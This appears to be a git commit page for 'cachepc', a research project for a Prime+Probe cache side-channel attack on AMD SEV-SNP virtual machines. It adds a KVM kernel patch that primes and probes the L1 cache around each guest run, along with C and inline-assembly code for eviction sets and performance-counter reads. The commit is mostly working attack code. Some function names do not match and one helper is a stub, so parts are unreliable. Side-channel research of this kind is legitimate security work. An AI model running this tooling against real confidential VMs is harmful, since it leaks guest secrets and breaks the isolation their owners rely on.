cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc
Log | Files | Refs | Submodules | README | sfeed.txt

commit cee2126b8f316677ebee57e19fe7d50d09c066d1
Author: Louis Burda <quent.burda@gmail.com>
Date:   Mon,  4 Jul 2022 16:26:35 +0200

Initial out-of-tree setup

Diffstat:
A.gitignore | 3+++
AMakefile | 25+++++++++++++++++++++++++
Apatch.diff | 59+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Asrc/asm.h | 72++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Asrc/cache_types.h | 66++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Asrc/cachepc.c | 221+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Asrc/cachepc.h | 135+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Asrc/device_conf.h | 29+++++++++++++++++++++++++++++
Asrc/util.c | 40++++++++++++++++++++++++++++++++++++++++
Asrc/util.h | 9+++++++++
10 files changed, 659 insertions(+), 0 deletions(-)

diff --git a/.gitignore b/.gitignore @@ -0,0 +1,3 @@ +build.sh +*.o.cmd +*.o diff --git a/Makefile b/Makefile @@ -0,0 +1,25 @@ +KERNEL_SOURCE ?= /usr/src/linux +PWD := $(shell pwd) + +.PHONY: all reset prepare build + +all: reset prepare build + +reset: + git -C $(KERNEL_SOURCE) reset --hard + $(MAKE) -C $(KERNEL_SOURCE) SUBDIRS=arch/x86/kvm clean + +prepare: + git -C $(KERNEL_SOURCE) apply $(PWD)/patch.diff + +$(KERNEL_SOURCE)/arch/x86/kvm/svm/cachepc: + ln -s $(PWD)/src $@ + +build: $(KERNEL_SOURCE)/arch/x86/kvm/svm/cachepc + $(MAKE) -C $(KERNEL_SOURCE) arch/x86/kvm/kvm.ko arch/x86/kvm/kvm-amd.ko + +load: + sudo rmmod kvm_amd || true + sudo rmmod kvm || true + sudo insmod $(KERNEL_SOURCE)/arch/x86/kvm/kvm.ko + sudo insmod $(KERNEL_SOURCE)/arch/x86/kvm/kvm-amd.ko diff --git a/patch.diff b/patch.diff @@ -0,0 +1,59 @@ +diff --git a/arch/x86/kvm/Makefile b/arch/x86/kvm/Makefile +index b804444e16d4..1f7d3b15cf4a 100644 +--- a/arch/x86/kvm/Makefile ++++ b/arch/x86/kvm/Makefile +@@ -20,7 +20,8 @@ kvm-y += x86.o emulate.o i8259.o irq.o lapic.o \ + + kvm-intel-y += vmx/vmx.o vmx/vmenter.o vmx/pmu_intel.o vmx/vmcs12.o \ + vmx/evmcs.o vmx/nested.o vmx/posted_intr.o +-kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o svm/avic.o svm/sev.o ++kvm-amd-y += svm/svm.o svm/vmenter.o svm/pmu.o svm/nested.o svm/avic.o svm/sev.o \ ++ svm/cachepc/cachepc.o svm/cachepc/util.o + + obj-$(CONFIG_KVM) += kvm.o + obj-$(CONFIG_KVM_INTEL) += kvm-intel.o +diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c +index 7b3cfbe8f7e3..cd5cb4320a17 100644 +--- a/arch/x86/kvm/svm/svm.c ++++ b/arch/x86/kvm/svm/svm.c +@@ -2,6 +2,8 @@ + + #include <linux/kvm_host.h> + ++#include "cachepc/cachepc.h" ++ + #include "irq.h" + #include "mmu.h" + #include "kvm_cache_regs.h" +@@ -3728,6 +3730,16 @@ void __svm_vcpu_run(unsigned long vmcb_pa, unsigned long *regs); + static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu, + struct vcpu_svm *svm) + { ++ static struct cache_ctx *ctx = NULL; ++ static struct cacheline *cache_ds = NULL; ++ static struct cacheline *curr_head = NULL; ++ static struct cacheline *next_head = NULL; ++ static int run_index = 0; ++ ++ if (!ctx) ctx = cachepc_get_ctx(L1); ++ if (!cache_ds) cache_ds = cachepc_prepare_ds(ctx); ++ if (!curr_head) curr_head = cache_ds; ++ + /* + * VMENTER enables interrupts (host state), but the kernel state is + * interrupts disabled when this is invoked. Also tell RCU about +@@ -3751,7 +3763,13 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu, + if (sev_es_guest(svm->vcpu.kvm)) { + __svm_sev_es_vcpu_run(svm->vmcb_pa); + } else { +- __svm_vcpu_run(svm->vmcb_pa, (unsigned long *)&svm->vcpu.arch.regs); ++ curr_head = cachepc_prime(curr_head); ++ __svm_vcpu_run(svm->vmcb_pa, (unsigned long *)&svm->vcpu.arch.regs); ++ next_head = cachepc_probe(curr_head); ++ //cachepc_save_msrmt(curr_head, "/tmp/msrmt", run_index); ++ cachepc_print_msrmt(curr_head); ++ curr_head = next_head; ++ run_index += 1; + + #ifdef CONFIG_X86_64 + native_wrmsrl(MSR_GS_BASE, svm->host.gs_base); diff --git a/src/asm.h b/src/asm.h @@ -0,0 +1,72 @@ +#pragma once + +#include <linux/kernel.h> + +#define CPUID_AFFECTED_REGS "rax", "rbx", "rcx", "rdx" + +__attribute__((always_inline)) +static inline uint64_t cachepc_readpmc(uint64_t event); + +__attribute__((always_inline)) +static inline void cachepc_cpuid(void); + +__attribute__((always_inline)) +static inline void cachepc_lfence(void); + +__attribute__((always_inline)) +static inline void cachepc_sfence(void); + +__attribute__((always_inline)) +static inline void cachepc_mfence(void); + +uint64_t +cachepc_readpmc(uint64_t event) +{ + uint32_t lo, hi; + + asm volatile ( + "mov %[event], %%rcx\t\n" + "rdpmc\t\n" + : "=a" (lo), "=d" (hi) + : [event] "r" (event) + ); + + return ((uint64_t) hi << 32) | lo; +} + +void +cachepc_cpuid(void) +{ + asm volatile( + "mov $0x80000005, %%eax\n\t" + "cpuid\n\t" + ::: CPUID_AFFECTED_REGS + ); +} + +void +cachepc_lfence(void) +{ + asm volatile( + "lfence\n\t" + :: + ); +} + +void +cachepc_sfence(void) +{ + asm volatile( + "sfence\n\t" + :: + ); +} + +void +cachepc_mfence(void) +{ + asm volatile( + "mfence\n\t" + :: + ); +} diff --git a/src/cache_types.h b/src/cache_types.h @@ -0,0 +1,66 @@ +#pragma once + +#include "device_conf.h" + +#include <linux/build_bug.h> + +#define SET_MASK(SETS) (((((uintptr_t) SETS) * CACHELINE_SIZE) - 1) ^ (CACHELINE_SIZE - 1)) + +#define REMOVE_PAGE_OFFSET(ptr) ((void *) (((uintptr_t) ptr) & PAGE_MASK)) + +#define GET_BIT(b, i) (((b & (1 << i)) >> i) & 1) +#define SET_BIT(b, i) (b | (1 << i)) + +/* Operate cacheline flags + * Used flags: + * 32 2 1 0 + * | | ... | cache group initialized | last | first | + */ +#define DEFAULT_FLAGS 0 +#define SET_FIRST(flags) SET_BIT(flags, 0) +#define SET_LAST(flags) SET_BIT(flags, 1) +#define SET_CACHE_GROUP_INIT(flags) SET_BIT(flags, 2) +#define IS_FIRST(flags) GET_BIT(flags, 0) +#define IS_LAST(flags) GET_BIT(flags, 1) +#define IS_CACHE_GROUP_INIT(flags) GET_BIT(flags, 2) + +// Offset of the next and prev field in the cacheline struct +#define CL_NEXT_OFFSET 0 +#define CL_PREV_OFFSET 8 + +typedef enum cache_level cache_level; +typedef enum addressing_type addressing_type; +typedef struct cacheline cacheline; +typedef struct cache_ctx cache_ctx; + +enum cache_level {L1, L2}; +enum addressing_type {VIRTUAL, PHYSICAL}; + +struct cache_ctx { + cache_level cache_level; + addressing_type addressing; + + uint32_t sets; + uint32_t associativity; + uint32_t access_time; + uint32_t nr_of_cachelines; + uint32_t set_size; + uint32_t cache_size; +}; + +struct cacheline { + // Doubly linked list inside same set + // Attention: CL_NEXT_OFFSET and CL_PREV_OFFSET + // must be kept up to date + cacheline *next; + cacheline *prev; + + uint16_t cache_set; + uint16_t flags; + + // Unused padding to fill cache line + uint64_t count; + char padding[32]; +}; + +static_assert(sizeof(struct cacheline) == CACHELINE_SIZE, "Bad cache line struct size"); diff --git a/src/cachepc.c b/src/cachepc.c @@ -0,0 +1,221 @@ +#include "cachepc.h" + +static cacheline *build_cache_ds(cache_ctx *ctx, cacheline **cacheline_ptr_arr); +static void build_randomized_list_for_cache_set(cache_ctx *ctx, cacheline **cacheline_ptr_arr); +static cacheline **allocate_cache_ds(cache_ctx *ctx); +static uint16_t get_virt_cache_set(cache_ctx *ctx, void *ptr); +static void *aligned_alloc(size_t alignment, size_t size); + +cache_ctx * +get_cache_ctx(cache_level cache_level) +{ + cache_ctx *ctx; + + ctx = kzalloc(sizeof(cache_ctx), GFP_KERNEL); + BUG_ON(ctx == NULL); + + if (cache_level == L1) { + ctx->addressing = L1_ADDRESSING; + ctx->sets = L1_SETS; + ctx->associativity = L1_ASSOCIATIVITY; + ctx->access_time = L1_ACCESS_TIME; + } else if (cache_level == L2) { + ctx->addressing = L2_ADDRESSING; + ctx->sets = L2_SETS; + ctx->associativity = L2_ASSOCIATIVITY; + ctx->access_time = L2_ACCESS_TIME; + } else { + return NULL; + } + + ctx->cache_level = cache_level; + ctx->nr_of_cachelines = ctx->sets * ctx->associativity; + ctx->set_size = CACHELINE_SIZE * ctx->associativity; + ctx->cache_size = ctx->sets * ctx->set_size; + + return ctx; +} + +/* + * Initialises the complete cache data structure for the given context + */ +cacheline * +cachepc_prepare_ds(cache_ctx *ctx) +{ + cacheline **cacheline_ptr_arr; + cacheline *cache_ds; + + cacheline_ptr_arr = allocate_cache_ds(ctx); + cache_ds = build_cache_ds(ctx, cacheline_ptr_arr); + kfree(cacheline_ptr_arr); + + return cache_ds; +} + +void +cachepc_save_msrmt(cacheline *head, const char *prefix, int index) +{ + char filename[256]; + + snprintf(filename, sizeof(filename), "%s.%i", prefix, index); + +} + +void +cache_print_msrmts(cacheline *head) +{ + cacheline *curr_cl; + + curr_cl = head; + do { + if (IS_FIRST(curr_cl->flags)) { + printk(KERN_WARNING "Count for cache set %i: %llu\n", + curr_cl->cache_set, curr_cl->count); + } + + curr_cl = curr_cl->prev; + } while (curr_cl != head); +} + +/* + * Create a randomized doubly linked list with the following structure: + * set A <--> set B <--> ... <--> set X <--> set A + * where each set is one of the cache sets, in a random order. + * The sets are a doubly linked list of cachelines themselves: + * set A: + * line[A + x0 * #sets] <--> line[A + x1 * #sets] <--> ... + * where x0, x1, ..., xD is a random permutation of 1, 2, ..., D + * and D = Associativity = | cache set | + */ +cacheline *build_cache_ds(cache_ctx *ctx, cacheline **cl_ptr_arr) { + cacheline **cl_ptr_arr_sorted; + cacheline *curr_cl, *next_cl; + cacheline *cache_ds; + uint32_t *idx_per_set; + uint32_t idx_curr_set, set_offset; + uint32_t i, j, set, set_len; + uint32_t *idx_map; + + idx_per_set = kzalloc(ctx->sets * sizeof(uint32_t), GFP_KERNEL); + BUG_ON(idx_per_set == NULL); + + cl_ptr_arr_sorted = kmalloc(ctx->nr_of_cachelines * sizeof(cacheline *), GFP_KERNEL); + BUG_ON(cl_ptr_arr_sorted == NULL); + + set_len = ctx->associativity; + for (i = 0; i < ctx->nr_of_cachelines; ++i) { + set_offset = cl_ptr_arr[i]->cache_set * set_len; + idx_curr_set = idx_per_set[cl_ptr_arr[i]->cache_set]; + + cl_ptr_arr_sorted[set_offset + idx_curr_set] = cl_ptr_arr[i]; + idx_per_set[cl_ptr_arr[i]->cache_set] += 1; + } + + // Build doubly linked list for every set + for (set = 0; set < ctx->sets; ++set) { + set_offset = set * set_len; + build_randomized_list_for_cache_set(ctx, cl_ptr_arr_sorted + set_offset); + } + + // Relink the sets among each other + idx_map = kzalloc(ctx->sets * sizeof(uint32_t), GFP_KERNEL); + BUG_ON(idx_map == NULL); + + gen_random_indices(idx_map, ctx->sets); + + curr_cl = cl_ptr_arr_sorted[idx_map[0] * set_len]->prev; + for (j = 0; j < ctx->sets; ++j) { + curr_cl->next = cl_ptr_arr_sorted[idx_map[(j + 1) % ctx->sets] * set_len]; + next_cl = curr_cl->next->prev; + curr_cl->next->prev = curr_cl; + curr_cl = next_cl; + } + + cache_ds = cl_ptr_arr_sorted[idx_map[0] * set_len]; + + kfree(cl_ptr_arr_sorted); + kfree(idx_per_set); + kfree(idx_map); + + return cache_ds; +} + +/* + * Helper function to build a randomised list of cacheline structs for a set + */ +void build_randomized_list_for_cache_set(cache_ctx *ctx, cacheline **cacheline_ptr_arr) +{ + cacheline *curr_cl; + uint32_t len, *idx_map; + uint16_t i; + + len = ctx->associativity; + idx_map = kzalloc(len * sizeof(uint32_t), GFP_KERNEL); + BUG_ON(idx_map == NULL); + + gen_random_indices(idx_map, len); + + for (i = 0; i < len; ++i) { + curr_cl = cacheline_ptr_arr[idx_map[i]]; + curr_cl->next = cacheline_ptr_arr[idx_map[(i + 1) % len]]; + curr_cl->prev = cacheline_ptr_arr[idx_map[(len - 1 + i) % len]]; + curr_cl->count = 0; + + if (curr_cl == cacheline_ptr_arr[0]) { + curr_cl->flags = SET_FIRST(DEFAULT_FLAGS); + curr_cl->prev->flags = SET_LAST(DEFAULT_FLAGS); + } else { + curr_cl->flags = curr_cl->flags | DEFAULT_FLAGS; + } + } + + kfree(idx_map); +} + +/* + * Allocate a data structure that fills the complete cache, i.e. consisting + * of `associativity` many cache lines for each cache set. + */ +cacheline ** +allocate_cache_ds(cache_ctx *ctx) +{ + cacheline **cl_ptr_arr, *cl_arr; + uint32_t i; + + cl_ptr_arr = (cacheline **) kzalloc(ctx->nr_of_cachelines * sizeof(cacheline *), GFP_KERNEL); + BUG_ON(cl_ptr_arr == NULL); + + BUG_ON(ctx->addressing != VIRTUAL); + + // For virtual addressing, allocating a consecutive chunk of memory is enough + cl_arr = (cacheline *) aligned_alloc(PAGE_SIZE, ctx->cache_size); + BUG_ON(cl_arr == NULL); + + for (i = 0; i < ctx->nr_of_cachelines; ++i) { + cl_ptr_arr[i] = cl_arr + i; + cl_ptr_arr[i]->cache_set = get_virt_cache_set(ctx, cl_ptr_arr[i]); + } + + return cl_ptr_arr; +} + +uint16_t +get_virt_cache_set(cache_ctx *ctx, void *ptr) +{ + return (uint16_t) ((((uintptr_t) ptr) & SET_MASK(ctx->sets)) / CACHELINE_SIZE); +} + +void * +aligned_alloc(size_t alignment, size_t size) +{ + void *p; + + if (size % alignment != 0) + size = size - (size % alignment) + alignment; + p = kmalloc(size, GFP_KERNEL); + BUG_ON(((uintptr_t) p) % alignment != 0); + + return p; +} + + diff --git a/src/cachepc.h b/src/cachepc.h @@ -0,0 +1,135 @@ +#pragma once + +#include <linux/kernel.h> +#include <linux/types.h> +#include <linux/slab.h> + +#include "asm.h" +#include "cache_types.h" +#include "util.h" + +cache_ctx *cachepc_get_ctx(cache_level cl); +cacheline *cachepc_prepare_ds(cache_ctx *ctx); +void cachepc_save_msrmt(cacheline *head, const char *prefix, int index); +void cachepc_print_msrmt(cacheline *head); + +__attribute__((always_inline)) +static inline cacheline *cachepc_prime(cacheline *head); + +__attribute__((always_inline)) +static inline cacheline *cachepc_prime_rev(cacheline *head); + +__attribute__((always_inline)) +static inline cacheline *cachepc_probe_set(cacheline *curr_cl); + +__attribute__((always_inline)) +static inline cacheline *cachepc_probe(cacheline *head); + +/* + * Prime phase: fill the target cache (encoded in the size of the data structure) + * with the prepared data structure, i.e. with attacker data. + */ +static inline cacheline * +cachepc_prime(cacheline *head) +{ + cacheline *curr_cl; + + cachepc_cpuid(); + curr_cl = head; + do { + curr_cl = curr_cl->next; + cachepc_mfence(); + } while(curr_cl != head); + cachepc_cpuid(); + + return curr_cl->prev; +} + +/* + * Same as prime, but in the reverse direction, i.e. the same direction that probe + * uses. This is beneficial for the following scenarios: + * - L1: + * - Trigger collision chain-reaction to amplify an evicted set (but this has + * the downside of more noisy measurements). + * - L2: + * - Always use this for L2, otherwise the first cache sets will still reside + * in L1 unless the victim filled L1 completely. In this case, an eviction + * has randomly (depending on where the cache set is placed in the randomised + * data structure) the following effect: + * A) An evicted set is L2_ACCESS_TIME - L1_ACCESS_TIME slower + * B) An evicted set is L3_ACCESS_TIME - L2_ACCESS_TIME slower + */ +static inline cacheline * +cachepc_prime_rev(cacheline *head) +{ + cacheline *curr_cl; + + cachepc_cpuid(); + curr_cl = head; + do { + curr_cl = curr_cl->prev; + cachepc_mfence(); + } while(curr_cl != head); + cachepc_cpuid(); + + return curr_cl->prev; +} + +static inline cacheline * +cachepc_probe_set(cacheline *curr_cl) +{ + uint64_t pre1, pre2, pre3; + uint64_t post1, post2, post3; + cacheline *next_cl; + + pre1 = cachepc_readpmc(0); + pre2 = cachepc_readpmc(1); + pre3 = cachepc_readpmc(2); + + cachepc_mfence(); + asm volatile( + "mov 8(%[curr_cl]), %%rax \n\t" // +8 + "mov 8(%%rax), %%rcx \n\t" // +16 + "mov 8(%%rcx), %%rax \n\t" // +24 + "mov 8(%%rax), %%rcx \n\t" // +32 + "mov 8(%%rcx), %%rax \n\t" // +40 + "mov 8(%%rax), %%rcx \n\t" // +48 + "mov 8(%%rcx), %[curr_cl_out] \n\t" // +56 + "mov 8(%[curr_cl_out]), %[next_cl_out] \n\t" // +64 + : [next_cl_out] "=r" (next_cl), + [curr_cl_out] "=r" (curr_cl) + : [curr_cl] "r" (curr_cl) + : "rax", "rcx" + ); + cachepc_mfence(); + cachepc_cpuid(); + + post1 = cachepc_readpmc(0); + cachepc_cpuid(); + post2 = cachepc_readpmc(1); + cachepc_cpuid(); + post3 = cachepc_readpmc(2); + cachepc_cpuid(); + + /* works across size boundary */ + curr_cl->count = 0; + curr_cl->count += post1 - pre1; + curr_cl->count += post2 - pre2; + curr_cl->count += post3 - pre3; + + return next_cl; +} + +static inline cacheline * +cachepc_probe(cacheline *head) +{ + cacheline *curr_cs; + + curr_cs = head; + do { + curr_cs = cachepc_probe_set(curr_cs); + } while (__builtin_expect(curr_cs != head, 1)); + + return curr_cs->next; +} + diff --git a/src/device_conf.h b/src/device_conf.h @@ -0,0 +1,29 @@ +#pragma once + +// TODO: Read from kernel headers + +// General settings +// #define PAGE_SIZE 4096 +#define PROCESSOR_FREQ 2900000000 + +// Cache related settings +#define CACHELINE_SIZE 64 +#define CACHE_GROUP_SIZE (PAGE_SIZE / CACHELINE_SIZE) + +// Addressing: +// - virtual: 0 +// - physical: 1 +#define L1_ADDRESSING 0 +#define L1_SETS 64 +#define L1_ASSOCIATIVITY 8 +#define L1_ACCESS_TIME 4 + +#define L2_ADDRESSING 1 +#define L2_SETS 512 +#define L2_ASSOCIATIVITY 8 +#define L2_ACCESS_TIME 12 + +#define L3_ADDRESSING 1 +#define L3_SETS 4096 +#define L3_ASSOCIATIVITY 16 +#define L3_ACCESS_TIME 30 diff --git a/src/util.c b/src/util.c @@ -0,0 +1,40 @@ +#include "util.h" + +#include <linux/random.h> + +void +random_perm(uint32_t *arr, uint32_t arr_len) +{ + uint32_t i, idx, tmp; + + for (i = arr_len - 1; i > 0; --i) { + get_random_bytes(&idx, 4); + idx = idx % i; + + tmp = arr[idx]; + arr[i] = arr[idx]; + arr[idx] = tmp; + } +} + +void +gen_random_indices(uint32_t *arr, uint32_t arr_len) +{ + uint32_t i; + + for (i = 0; i < arr_len; ++i) + arr[i] = i; + random_perm(arr, arr_len); +} + + +bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len) { + uint32_t i; + + for (i = 0; i < arr_len; ++i) { + if (arr[i] == elem) + return true; + } + + return false; +} diff --git a/src/util.h b/src/util.h @@ -0,0 +1,9 @@ +#pragma once + +#include <linux/kernel.h> + +void gen_rand_bytes(unsigned char *arr, uint32_t arr_len); +void random_perm(uint32_t *arr, uint32_t arr_len); +void gen_random_indices(uint32_t *arr, uint32_t arr_len); + +bool is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len);